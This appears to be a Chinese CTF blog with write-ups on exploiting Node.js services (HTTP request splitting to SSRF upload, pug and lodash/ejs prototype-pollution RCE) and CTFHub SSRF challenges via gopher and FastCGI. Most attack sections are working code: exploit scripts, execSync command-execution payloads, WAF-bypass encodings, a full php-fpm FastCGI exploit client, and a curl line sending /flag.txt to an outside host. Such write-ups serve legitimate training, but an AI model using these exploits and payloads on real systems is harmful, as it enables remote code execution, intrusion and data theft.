var express = require('express');var app = express();var fs = require('fs');var path = require('path');var http = require('http');var pug = require('pug');var morgan = require('morgan');const multer = require('multer');app.use(multer({dest: './dist'}).array('file'));app.use(morgan('short'));app.use("/uploads",express.static(path.join(__dirname, '/uploads')))app.use("/template",express.static(path.join(__dirname, '/template')))app.get('/', function(req, res) {    var action = req.query.action?req.query.action:"index";    if( action.includes("/") || action.includes("\\") ){        res.send("Errrrr, You have been Blocked");    }    file = path.join(__dirname + '/template/'+ action +'.pug');    var html = pug.renderFile(file);    res.send(html);});app.post('/file_upload', function(req, res){    var ip = req.connection.remoteAddress;    var obj = {        msg: '',    }    if (!ip.includes('127.0.0.1')) {        obj.msg="only admin's ip can use it"        res.send(JSON.stringify(obj));        return     }    fs.readFile(req.files[0].path, function(err, data){        if(err){            obj.msg = 'upload failed';            res.send(JSON.stringify(obj));        }else{            var file_path = '/uploads/' + req.files[0].mimetype +"/";            var file_name = req.files[0].originalname            var dir_file = __dirname + file_path + file_name            if(!fs.existsSync(__dirname + file_path)){                try {                    fs.mkdirSync(__dirname + file_path)                } catch (error) {                    obj.msg = "file type error";                    res.send(JSON.stringify(obj));                    return                }            }            try {                fs.writeFileSync(dir_file,data)                obj = {                    msg: 'upload success',                    filename: file_path + file_name                }             } catch (error) {                obj.msg = 'upload failed';            }            res.send(JSON.stringify(obj));            }    })})app.get('/source', function(req, res) {    res.sendFile(path.join(__dirname + '/template/source.txt'));});app.get('/core', function(req, res) {    var q = req.query.q;    var resp = "";    if (q) {        var url = 'http://localhost:8081/source?' + q        console.log(url)        var trigger = blacklist(url);        if (trigger === true) {            res.send("error occurs!
");        } else {            try {                http.get(url, function(resp) {                    resp.setEncoding('utf8');                    resp.on('error', function(err) {                    if (err.code === "ECONNRESET") {                     console.log("Timeout occurs");                     return;                    }                   });                    resp.on('data', function(chunk) {                        try {                         resps = chunk.toString();                         res.send(resps);                        }catch (e) {                           res.send(e.message);                        }                     }).on('error', (e) => {                         res.send(e.message);});                });            } catch (error) {                console.log(error);            }        }    } else {        res.send("search param 'q' missing!");    }})function blacklist(url) {    var evilwords = ["global", "process","mainModule","require","root","child_process","exec","\"","'","!"];    var arrayLen = evilwords.length;    for (var i = 0; i < arrayLen; i++) {        const trigger = url.includes(evilwords[i]);        if (trigger === true) {            return true        }    }}var server = app.listen(8081, function() {    var host = server.address().address    var port = server.address().port    console.log("Example app listening at http://%s:%s", host, port)})

先看代码逻辑，express框架写的，路由交给express处理

根路由/，接收一个action参数，不允许出现/和\\（反斜杠），path拼接使用pug 引擎渲染模板到前端

/file_upload，很明显文件上传，但是需要ip.includes('127.0.0.1')，ip由req.connection.remoteAddress获取，我们知道remoteAddress这种http是无法伪造的，所以必须得是本地请求才可以上传文件，可能涉及SSRF，file_path由mimetype直接拼接，未做任何校验，可以路径穿越上传任意文件，这里先放着

/source，源码获取

/core，接收一个q，访问本地8081端口的资源，放到/source后面，然后会显示访问的结果，这里估计就是SSRF的点了

逻辑分析完，根据题目提示，node版本，估计是node的洞，网上查了一下，这个版本的 Node 的 http 模块涉及一个拆分攻击漏洞，这个问题是由Node.js将HTTP请求写入路径时对unicode字符的有损编码引起的。

详见：https://xz.aliyun.com/t/2894

于是我们可以构造恶意请求

原始请求头：

GET /source?q=x HTTP/1.1

插入文件上传请求头：

GET /source?q=x HTTP/1.1POST /file_upload HTTP/1.1Host: localhost:8081xxx文件内容

文件内容根据pug引擎手册来写： https://pugjs.org/zh-cn/language/includes.html

读flag的话包含flag文件即可，格式如下

doctype htmlhtml  head    style      include ../../../../../../../flag.txt

Content-Type: /../template，写pug到template目录下

Connection: Keep-Alive，表明客户端想要保持该网络连接打开，Connection

Exp：

import urllib.parseimport requestspayload = '''x HTTP/1.1Host: xConnection: keep-alivePOST /file_upload HTTP/1.1Host: xContent-Type: multipart/form-data; boundary=--------------------------123Connection: keep-alivecache-control: no-cacheContent-Length: 253----------------------------123Content-Disposition: form-data; name="file"; filename="extrader.pug"Content-Type: ../templatedoctype htmlhtml  head    style      include ../../../../../../../flag.txt----------------------------123--GET /flag HTTP/1.1Host: xConnection: closex:'''payload = payload.replace("\n", "\r\n")payload = ''.join(chr(int('0xff' + hex(ord(c))[2:].zfill(2), 16)) for c in payload)print(payload)print(requests.get('http://8a307357-1cde-471d-b257-70794a7efa58.node4.buuoj.cn:81/core?q=' + urllib.parse.quote(payload)).text)print(requests.get('http://8a307357-1cde-471d-b257-70794a7efa58.node4.buuoj.cn:81/?action=extrader').text)

但如果我们想嵌入代码RCE呢？

还是根据文档来：https://pugjs.org/zh-cn/language/code.html

- global.process.mainModule.require('child_process').execSync('evalcmd')

但是这里有个blacklist

字符串拼接绕过：

- eval("glob"+"al.proce"+"ss.mainMo"+"dule.re"+"quire('child_'+'pro'+'cess')['ex'+'ecSync']('whoami').toString()")

对参数URL编码绕过：https://blog.5am3.com/2020/02/11/ctf-node1/#自己出的-node-gamev

Exp：

import requestsimport syspayloadRaw = """x HTTP/1.1POST /file_upload HTTP/1.1Host: localhost:8081User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------12837266501973088788260782942Content-Length: 6279Origin: http://localhost:8081Connection: closeReferer: http://localhost:8081/?action=uploadUpgrade-Insecure-Requests: 1-----------------------------12837266501973088788260782942Content-Disposition: form-data; name="file"; filename="5am3_get_flag.pug"Content-Type: ../template- global.process.mainModule.require('child_process').execSync('evalcmd')-----------------------------12837266501973088788260782942--"""def getParm(payload):    payload = payload.replace(" ","%C4%A0")    payload = payload.replace("\n","%C4%8D%C4%8A")    payload = payload.replace("\"","%C4%A2")    payload = payload.replace("'","%C4%A7")    payload = payload.replace("`","%C5%A0")    payload = payload.replace("!","%C4%A1")    payload = payload.replace("+","%2B")    payload = payload.replace(";","%3B")    payload = payload.replace("&","%26")    # Bypass Waf     payload = payload.replace("global","%C5%A7%C5%AC%C5%AF%C5%A2%C5%A1%C5%AC")    payload = payload.replace("process","%C5%B0%C5%B2%C5%AF%C5%A3%C5%A5%C5%B3%C5%B3")    payload = payload.replace("mainModule","%C5%AD%C5%A1%C5%A9%C5%AE%C5%8D%C5%AF%C5%A4%C5%B5%C5%AC%C5%A5")    payload = payload.replace("require","%C5%B2%C5%A5%C5%B1%C5%B5%C5%A9%C5%B2%C5%A5")    payload = payload.replace("root","%C5%B2%C5%AF%C5%AF%C5%B4")    payload = payload.replace("child_process","%C5%A3%C5%A8%C5%A9%C5%AC%C5%A4%C5%9F%C5%B0%C5%B2%C5%AF%C5%A3%C5%A5%C5%B3%C5%B3")    payload = payload.replace("exec","%C5%A5%C5%B8%C5%A5%C5%A3")        return payloaddef run(url,cmd):    payloadC =  payloadRaw.replace("evalcmd",cmd)    urlC = url+"/core?q="+getParm(payloadC)    requests.get(urlC)        return requests.get(url+"/?action=5am3_get_flag").textif __name__ == '__main__':    targetUrl = sys.argv[1]    cmd = sys.argv[2]    print(run(targetUrl,cmd))# python3 exp.py http://127.0.0.1:8081 "curl eval.com -X POST -d `cat /flag.txt`"

[GYCTF2020]Ez_Express

知识点：原型链污染，ejs模板引擎远程代码执行漏洞(CVE-2020-35772)

首页如下，访问www.zip可以得到一份代码

目录结构如下（node_modules是我本地搭环境的时候npm install）

我们主要看到index.js代码

var express = require('express');var router = express.Router();const isObject = obj => obj && obj.constructor && obj.constructor === Object;const merge = (a, b) => {  for (var attr in b) {    if (isObject(a[attr]) && isObject(b[attr])) {      merge(a[attr], b[attr]);    } else {      a[attr] = b[attr];    }  }  return a}const clone = (a) => {  return merge({}, a);}function safeKeyword(keyword) {  if(keyword.match(/(admin)/is)) {      return keyword  }  return undefined}router.get('/', function (req, res) {  if(!req.session.user){    res.redirect('/login');  }  res.outputFunctionName=undefined;  res.render('index',data={'user':req.session.user.user});});router.get('/login', function (req, res) {  res.render('login');});router.post('/login', function (req, res) {  if(req.body.Submit=="register"){   if(safeKeyword(req.body.userid)){    res.end("")    }    req.session.user={      'user':req.body.userid.toUpperCase(),      'passwd': req.body.pwd,      'isLogin':false    }    res.redirect('/');   }  else if(req.body.Submit=="login"){    if(!req.session.user){res.end("")}    if(req.session.user.user==req.body.userid&&req.body.pwd==req.session.user.passwd){      req.session.user.isLogin=true;    }    else{      res.end("")    }    }  res.redirect('/'); ;});router.post('/action', function (req, res) {  if(req.session.user.user!="ADMIN"){res.end("")}   req.session.user.data = clone(req.body);  res.end("");  });router.get('/info', function (req, res) {  res.render('index',data={'user':res.outputFunctionName});})module.exports = router;

这里涉及的CVE可以看 Express+lodash+ejs: 从原型链污染到RCE，然后再来看这个代码就知道如何利用了

明显的clone->merge原型链污染，代码逻辑比较简单，一个login，一个register，我们看到clone函数在哪里使用了，action这个路由，咋一看，好像是需要user是ADMIN才可以执行这个反序列化，但是这里注意看，这个if后的大括号，并没有包括下面两行代码，我有充分的理由怀疑出题人这里大括号位置搞错了，这样的话，ADMIN的限制也就不存在了，而且他这个if也没有return出去，代码还是会往下执行。

先随便注册一个用户，否则会报Cannot read property 'user' of undefined错，因为需要req.session.user.data = clone(req.body)

然后直接构造payload到action处发包

{"__proto__":{"outputFunctionName":"a; return global.process.mainModule.constructor._load('child_process').execSync('cat /flag'); //"}}

再访问首页触发payload，即可拿到flag

但是如果限制了登录呢？我们再来看代码逻辑

login那里有个safeKeyword正则校验是否为admin，后面存入session的时候有一个toUpperCase()的操作，这里参考P🐮的 Fuzz中的javascript大小写特性

直接把原文搬过来了

在javascript中有几个特殊的字符需要记录一下
对于toUpperCase():
字符"ı"、"ſ" 经过toUpperCase处理后结果为 "I"、"S"
对于toLowerCase():
字符"K"经过toLowerCase处理后结果为"k"(这个K不是K)
在绕一些规则的时候就可以利用这几个特殊字符进行绕过

直接注册的时候把 admin 写成 admın 即可绕过上面的限制了。后面思路还是一样。

Code-Breaking 2018 Thejs

P🐮知识星球两周年活动，2018年的，我那时候还没加入。。。说多了都是泪。。有机会把几道题都玩玩

题目链接：https://code-breaking.com/puzzle/9/

这题主要涉及原型链的利用，利用方式不复杂，主要还是得找到关键点，得看懂代码

拿到题目源码，npm install把模块下一下，就可以用node跑了

看到server.js源码

const fs = require('fs')const express = require('express')const bodyParser = require('body-parser')const lodash = require('lodash')const session = require('express-session')const randomize = require('randomatic')const app = express()app.use(bodyParser.urlencoded({extended: true})).use(bodyParser.json())app.use('/static', express.static('static'))app.use(session({    name: 'thejs.session',    secret: randomize('aA0', 16),    resave: false,    saveUninitialized: false}))app.engine('ejs', function (filePath, options, callback) { // define the template engine    fs.readFile(filePath, (err, content) => {        if (err) return callback(new Error(err))        let compiled = lodash.template(content)        let rendered = compiled({...options})        return callback(null, rendered)    })})app.set('views', './views')app.set('view engine', 'ejs')app.all('/', (req, res) => {    let data = req.session.data || {language: [], category: []}    // 接收post请求    if (req.method == 'POST') {        // 对象数据合并操作        data = lodash.merge(data, req.body)        // 把data存到session中        req.session.data = data    }        res.render('index', {        language: data.language,         category: data.category    })})app.listen(3000, () => console.log(`Example app listening on port 3000!`))

直接就看到了lodash.merge这个操作，具体可以回顾我前面的 JavaScript原型链污染漏洞学习

先看一下发送正常的数据包，后端的数据变化

language[]=python&language[]=go&category[]=pwn

步过：

可以看到将language和category这两个数组对象存到了data中，简单来说，就是在data这个对象中添加了两个数组对象，数组的值就是我们post提交的值

根据我们前面分析的merge利用操作，我们可以直接post一个json格式的字符串，来对data这个对象的原型进行修改，data对象的原型就是Object，看下data.__proto__就可以知道

那我们这里可以尝试一下

{"__proto__":{"name":"extrader"}}

注意要设置Content-Type: application/json，否则后端express不会解析json，而且要保证子类中没有name这个变量，子类会继承父类的所有方法，只有当前类没有定义这个变量，才会去父类寻找。

断点下着，看调试结果

步过：

看到上图，我们成功污染了Object原型方法，在里面加入了一个name，那这个时候，改如何利用这一点？我们的目的，RCE

所以我们需要找到一个在影响Object后可以RCE的地方，其实这才是关键。。。

直接看结果吧

app.engine('ejs', function (filePath, options, callback) { // define the template engine    fs.readFile(filePath, (err, content) => {        if (err) return callback(new Error(err))        let compiled = lodash.template(content)        let rendered = compiled({...options})        return callback(null, rendered)    })})

lodash.template：一个模板引擎方法，我们可以在server.js的代码中看到

找到源代码，主要看以下代码

// Use a sourceURL for easier debugging.var sourceURL = 'sourceURL' in options ? '//# sourceURL=' + options.sourceURL + '\n' : '';...var result = attempt(function() {    return Function(importsKeys, sourceURL + 'return ' + source)        .apply(undefined, importsValues);});

options是一个Object，sourceURL这个变量取options.sourceURL中的值，原本options中是没有sourceURL这个值的，于是这个变量为空

但是通过原型链污染，我们可以令options.sourceURL中有值，即取到Object中的值，于是我们就可以控制sourceURL这个变量

在后面我们可以看到sourceURL被拼接到Function方法的最后一个参数，这个参数是一个含有包括函数定义的 JavaScript 语句的字符串。

Function这里定义了一个函数是不会调用的，但后面跟了个apply方法，而这个方法就是给前面的Function传值调用的，于是就执行了Function中的代码

构造恶意payload如下

{"__proto__":{"sourceURL":"\nreturn e=> {return global.process.mainModule.constructor._load('child_process').execSync('whoami')}\n//"}}

注意这里为什么要用e=>箭头函数，如果不使用的话，会报一个TypeError: compiled is not a function错误

compiled得到的是lodash.template返回的结果，即template中定义的result，而这个结果需要是一个function，因为后面有compiled({...options})调用，具体看server代码

所以我们需要使用箭头函数返回一个function，使得程序能够继续运行下去

以上payload确实可以得到命令执行的结果，但是这样并不好

P🐮给出的解释如下

原型链污染攻击有个弊端，就是你一旦污染了原型链，除非整个程序重启，否则所有的对象都会被污染与影响。
这将导致一些正常的业务出现bug，或者就像这道题里一样，我的payload发出去，response里就有命令的执行结果了。这时候其他用户访问这个页面的时候就能看到这个结果，所以在CTF中就会泄露自己好不容易拿到的flag，所以需要一个for循环把Object对象里污染的原型删掉。

如果我们用上面的payload，然后我们随意访问题目链接，都会将我们命令执行的结果输出出来，于是就有了改进后的payload

{"__proto__":{"sourceURL":"\nreturn e=> {for (var a in {}) {delete Object.prototype[a];} return global.process.mainModule.constructor._load('child_process').execSync('whoami')}\n//"}}

这样就不会出现破坏真实业务这种情况了

命令执行还可以使用require

global.require("child_process").execSync("whoami").toString()

但是这道题中并没有require

总结

原型链还是比较有意思的，但总的来说还是代码审计，慢慢来吧
未完待续，后面如果碰到了有意思JavaScript的题还会继续往上面放

参考

CTFHub-SSRF学习

2021-07-08T06:20:21.000Z

主要学习一下内网中各种常用的协议，一步步来

前言

SSRF漏洞的主要成因主要是因为Web应用程序对用户提供的URL和远端服务器返回的信息没有进行合适的验证和过滤

攻击者利用SSRF可以实现的攻击如下：

可以对外网、服务器所在内网、本地进行端口扫描，获取一些服务的banner信息;
攻击运行在内网或本地的应用程序(比如溢出);
对内网web应用进行指纹识别，通过访问默认文件实现;
攻击内外网的web应用，主要是使用get参数就可以实现的攻击(比如struts2，sqli等);
利用file协议读取本地文件等。

CTFHub上的题

内网访问

题目提示尝试访问位于127.0.0.1的flag.php吧

http协议直接读了

?url=http://127.0.0.1/flag.php

伪协议读取文件

题目提示尝试去读取一下Web目录下的flag.php吧

file协议读取文件，需要绝对路径

?url=file:///var/www/html/flag.php

我们可以再读一下index.php看看漏洞代码，代码如下：

error_reporting(0);if (!isset($_REQUEST['url'])){    header("Location: /?url=_");    exit;}$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);curl_setopt($ch, CURLOPT_HEADER, 0);curl_exec($ch);curl_close($ch);

可以看到，这里使用的是PHP cURL 函数来进行数据的获取，具体可参考 -> PHP cURL 函数

支持http、https、ftp、gopher、telnet、dict、file和ldap协议

端口扫描

题目提示来来来性感CTFHub在线扫端口,据说端口范围是8000-9000哦

http请求，放到bp里跑一下端口即可，当然也可以先用dict协议来进行端口探测，然后再使用http来访问内容

?url=http://127.0.0.1:8704

POST请求

题目提示这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年

扫描结果如下

访问flag.php提示Just View From 127.0.0.1

利用SSRF请求

另外用file可以读到源码

flag.php

error_reporting(0);if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {    echo "Just View From 127.0.0.1";    return;}$flag=getenv("CTFHUB");$key = md5($flag);if (isset($_POST["key"]) && $_POST["key"] == $key) {    echo $flag;    exit;}?><form action="/flag.php" method="post"><input type="text" name="key">form>

可以看到需要POST一个key，并且key要等于md5(flag)，才可以拿到flag，并且需要$_SERVER["REMOTE_ADDR"] == "127.0.0.1"

key前面是拿到了的，为bacd40b119dfa24fa24640331508799f

于是利用gopher协议发包

数据包为

POST /flag.php HTTP/1.1Host: 127.0.0.1Content-Type: application/x-www-form-urlencodedContent-Length: 36key=bacd40b119dfa24fa24640331508799f

用python请求，exp如下

import urllib.parseimport requestsurl = "http://challenge-27a1758eb0df6f71.sandbox.ctfhub.com:10800/?url="payload =\"""POST /flag.php HTTP/1.1Host: 127.0.0.1Content-Type: application/x-www-form-urlencodedContent-Length: 36key=bacd40b119dfa24fa24640331508799f"""#注意后面一定要有回车，回车结尾表示http请求结束tmp = urllib.parse.quote(payload)new = tmp.replace('%0A','%0D%0A')result = 'gopher://127.0.0.1:80/'+'_'+newresult = urllib.parse.quote(result)print(result)       # 这里因为是GET请求所以要进行两次url编码r = requests.get(url=url+result)print(r.text)

gopher%3A//127.0.0.1%3A80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253Dbacd40b119dfa24fa24640331508799f%250D%250A

请求结果如下

上传文件

题目提示这次需要上传一个文件到flag.php了.祝你好运

http请求一下flag.php

file读下源码

error_reporting(0);if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){    echo "Just View From 127.0.0.1";    return;}if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){    echo getenv("CTFHUB");    exit;}?>Upload Webshell<form action="/flag.php" method="post" enctype="multipart/form-data">    <input type="file" name="file">form>

写个文件上传的表单

<form enctype="multipart/form-data" action="http://127.0.0.1/flag.php" method="post">    <input type="file" name="NewFile" size="50"><br>    <input id="upload" type="submit" value="Upload">form>

随便传个文件把包抓下来

数据包为

POST /flag.php HTTP/1.1Host: 127.0.0.1Content-Length: 182Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqFOX61XFhjO2CFJN------WebKitFormBoundaryqFOX61XFhjO2CFJNContent-Disposition: form-data; name="file"; filename="1.png"Content-Type: image/pngabcd------WebKitFormBoundaryqFOX61XFhjO2CFJN--

还是和上一个一样，exp如下

import urllib.parseimport requestsurl = "http://challenge-db30f38f11747128.sandbox.ctfhub.com:10800/?url="payload =\"""POST /flag.php HTTP/1.1Host: 127.0.0.1Content-Length: 182Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqFOX61XFhjO2CFJN------WebKitFormBoundaryqFOX61XFhjO2CFJNContent-Disposition: form-data; name="file"; filename="1.png"Content-Type: image/pngabcd------WebKitFormBoundaryqFOX61XFhjO2CFJN--"""tmp = urllib.parse.quote(payload)new = tmp.replace('%0A','%0D%0A')result = 'gopher://127.0.0.1:80/'+'_'+newresult = urllib.parse.quote(result)print(result)r = requests.get(url=url+result)print(r.text)

gopher%3A//127.0.0.1%3A80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Length%253A%2520182%250D%250AContent-Type%253A%2520multipart/form-data%253B%2520boundary%253D----WebKitFormBoundaryqFOX61XFhjO2CFJN%250D%250A%250D%250A------WebKitFormBoundaryqFOX61XFhjO2CFJN%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%25221.png%2522%250D%250AContent-Type%253A%2520image/png%250D%250A%250D%250Aabcd%250D%250A------WebKitFormBoundaryqFOX61XFhjO2CFJN--%250D%250A

请求结果如下

FastCGI协议

题目提示这次.我们需要攻击一下fastcgi协议咯.也许附件的文章会对你有点帮助

直接看P🐮的这个 https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html

利用方法参考 https://bbs.ichunqiu.com/thread-58455-1-1.html

理解原理后直接利用，利用脚本地址 https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75

我这里放这存一个

import socketimport randomimport argparseimport sysfrom io import BytesIO# Referrer: https://github.com/wuyunfeng/Python-FastCGI-ClientPY2 = True if sys.version_info.major == 2 else Falsedef bchr(i):    if PY2:        return force_bytes(chr(i))    else:        return bytes([i])def bord(c):    if isinstance(c, int):        return c    else:        return ord(c)def force_bytes(s):    if isinstance(s, bytes):        return s    else:        return s.encode('utf-8', 'strict')def force_text(s):    if issubclass(type(s), str):        return s    if isinstance(s, bytes):        s = str(s, 'utf-8', 'strict')    else:        s = str(s)    return sclass FastCGIClient:    """A Fast-CGI Client for Python"""    # private    __FCGI_VERSION = 1    __FCGI_ROLE_RESPONDER = 1    __FCGI_ROLE_AUTHORIZER = 2    __FCGI_ROLE_FILTER = 3    __FCGI_TYPE_BEGIN = 1    __FCGI_TYPE_ABORT = 2    __FCGI_TYPE_END = 3    __FCGI_TYPE_PARAMS = 4    __FCGI_TYPE_STDIN = 5    __FCGI_TYPE_STDOUT = 6    __FCGI_TYPE_STDERR = 7    __FCGI_TYPE_DATA = 8    __FCGI_TYPE_GETVALUES = 9    __FCGI_TYPE_GETVALUES_RESULT = 10    __FCGI_TYPE_UNKOWNTYPE = 11    __FCGI_HEADER_SIZE = 8    # request state    FCGI_STATE_SEND = 1    FCGI_STATE_ERROR = 2    FCGI_STATE_SUCCESS = 3    def __init__(self, host, port, timeout, keepalive):        self.host = host        self.port = port        self.timeout = timeout        if keepalive:            self.keepalive = 1        else:            self.keepalive = 0        self.sock = None        self.requests = dict()    def __connect(self):        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        self.sock.settimeout(self.timeout)        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)        # if self.keepalive:        #     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1)        # else:        #     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0)        try:            self.sock.connect((self.host, int(self.port)))        except socket.error as msg:            self.sock.close()            self.sock = None            print(repr(msg))            return False        return True    def __encodeFastCGIRecord(self, fcgi_type, content, requestid):        length = len(content)        buf = bchr(FastCGIClient.__FCGI_VERSION) \               + bchr(fcgi_type) \               + bchr((requestid >> 8) & 0xFF) \               + bchr(requestid & 0xFF) \               + bchr((length >> 8) & 0xFF) \               + bchr(length & 0xFF) \               + bchr(0) \               + bchr(0) \               + content        return buf    def __encodeNameValueParams(self, name, value):        nLen = len(name)        vLen = len(value)        record = b''        if nLen < 128:            record += bchr(nLen)        else:            record += bchr((nLen >> 24) | 0x80) \                      + bchr((nLen >> 16) & 0xFF) \                      + bchr((nLen >> 8) & 0xFF) \                      + bchr(nLen & 0xFF)        if vLen < 128:            record += bchr(vLen)        else:            record += bchr((vLen >> 24) | 0x80) \                      + bchr((vLen >> 16) & 0xFF) \                      + bchr((vLen >> 8) & 0xFF) \                      + bchr(vLen & 0xFF)        return record + name + value    def __decodeFastCGIHeader(self, stream):        header = dict()        header['version'] = bord(stream[0])        header['type'] = bord(stream[1])        header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])        header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])        header['paddingLength'] = bord(stream[6])        header['reserved'] = bord(stream[7])        return header    def __decodeFastCGIRecord(self, buffer):        header = buffer.read(int(self.__FCGI_HEADER_SIZE))        if not header:            return False        else:            record = self.__decodeFastCGIHeader(header)            record['content'] = b''                        if 'contentLength' in record.keys():                contentLength = int(record['contentLength'])                record['content'] += buffer.read(contentLength)            if 'paddingLength' in record.keys():                skiped = buffer.read(int(record['paddingLength']))            return record    def request(self, nameValuePairs={}, post=''):        if not self.__connect():            print('connect failure! please check your fasctcgi-server !!')            return        requestId = random.randint(1, (1 << 16) - 1)        self.requests[requestId] = dict()        request = b""        beginFCGIRecordContent = bchr(0) \                                 + bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \                                 + bchr(self.keepalive) \                                 + bchr(0) * 5        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,                                              beginFCGIRecordContent, requestId)        paramsRecord = b''        if nameValuePairs:            for (name, value) in nameValuePairs.items():                name = force_bytes(name)                value = force_bytes(value)                paramsRecord += self.__encodeNameValueParams(name, value)        if paramsRecord:            request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)        if post:            request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)        self.sock.send(request)        self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SEND        self.requests[requestId]['response'] = b''        return self.__waitForResponse(requestId)    def __waitForResponse(self, requestId):        data = b''        while True:            buf = self.sock.recv(512)            if not len(buf):                break            data += buf        data = BytesIO(data)        while True:            response = self.__decodeFastCGIRecord(data)            if not response:                break            if response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \                    or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:                if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:                    self.requests['state'] = FastCGIClient.FCGI_STATE_ERROR                if requestId == int(response['requestId']):                    self.requests[requestId]['response'] += response['content']            if response['type'] == FastCGIClient.FCGI_STATE_SUCCESS:                self.requests[requestId]        return self.requests[requestId]['response']    def __repr__(self):        return "fastcgi connect host:{} port:{}".format(self.host, self.port)if __name__ == '__main__':    parser = argparse.ArgumentParser(description='Php-fpm code execution vulnerability client.')    parser.add_argument('host', help='Target host, such as 127.0.0.1')    parser.add_argument('file', help='A php file absolute path, such as /usr/local/lib/php/System.php')    parser.add_argument('-c', '--code', help='What php code your want to execute', default='')    parser.add_argument('-p', '--port', help='FastCGI port', default=9000, type=int)    args = parser.parse_args()    client = FastCGIClient(args.host, args.port, 3, 0)    params = dict()    documentRoot = "/"    uri = args.file    content = args.code    params = {        'GATEWAY_INTERFACE': 'FastCGI/1.0',        'REQUEST_METHOD': 'POST',        'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),        'SCRIPT_NAME': uri,        'QUERY_STRING': '',        'REQUEST_URI': uri,        'DOCUMENT_ROOT': documentRoot,        'SERVER_SOFTWARE': 'php/fcgiclient',        'REMOTE_ADDR': '127.0.0.1',        'REMOTE_PORT': '9985',        'SERVER_ADDR': '127.0.0.1',        'SERVER_PORT': '80',        'SERVER_NAME': "localhost",        'SERVER_PROTOCOL': 'HTTP/1.1',        'CONTENT_TYPE': 'application/text',        'CONTENT_LENGTH': "%d" % len(content),        'PHP_VALUE': 'auto_prepend_file = php://input',        'PHP_ADMIN_VALUE': 'allow_url_include = On'    }    response = client.request(params, content)    print(force_text(response))

找flag：

python .\fpm.py "172.22.73.110" "/var/www/html/index.php" -c "" -p 2333

wsl上监听2333端口用来接收flag，并将结果保存到fcg_exp.txt文件

gopher%3A//127.0.0.1%3A9000/_%2501%2501%25E7%25F4%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%25E7%25F4%2501%25DB%2500%2500%2511%250BGATEWAY_INTERFACEFastCGI/1.0%250E%2504REQUEST_METHODPOST%250F%2517SCRIPT_FILENAME/var/www/html/index.php%250B%2517SCRIPT_NAME/var/www/html/index.php%250C%2500QUERY_STRING%250B%2517REQUEST_URI/var/www/html/index.php%250D%2501DOCUMENT_ROOT/%250F%250ESERVER_SOFTWAREphp/fcgiclient%250B%2509REMOTE_ADDR127.0.0.1%250B%2504REMOTE_PORT9985%250B%2509SERVER_ADDR127.0.0.1%250B%2502SERVER_PORT80%250B%2509SERVER_NAMElocalhost%250F%2508SERVER_PROTOCOLHTTP/1.1%250C%2510CONTENT_TYPEapplication/text%250E%2502CONTENT_LENGTH33%2509%251FPHP_VALUEauto_prepend_file%2520%253D%2520php%253A//input%250F%2516PHP_ADMIN_VALUEallow_url_include%2520%253D%2520On%2501%2504%25E7%25F4%2500%2500%2500%2500%2501%2505%25E7%25F4%2500%2521%2500%2500%253C%253Fphp%2520system%2528%2527ls%253Bls%2520/%2527%2529%253B%2520exit%253B%2520%253F%253E%2501%2505%25E7%25F4%2500%2500%2500%2500

然后再将文件读取出来得到有效的payload直接打

from urllib.parse import quote, unquote, urlencodeimport requestsurl = "http://challenge-3c0ef6982bf49126.sandbox.ctfhub.com:10800/?url="file = open('fcg_exp.txt','rb')payload = file.read()result = quote("gopher://127.0.0.1:9000/_"+quote(payload).replace("%0A","%0D").replace("%2F","/"))print(result)r = requests.get(url=url+result)print(r.text)

看到flag文件flag_488cfa9618a27d4323c5cf9791dd2bcc

最后直接读文件

python .\fpm.py "172.22.73.110" "/var/www/html/index.php" -c "" -p 2333

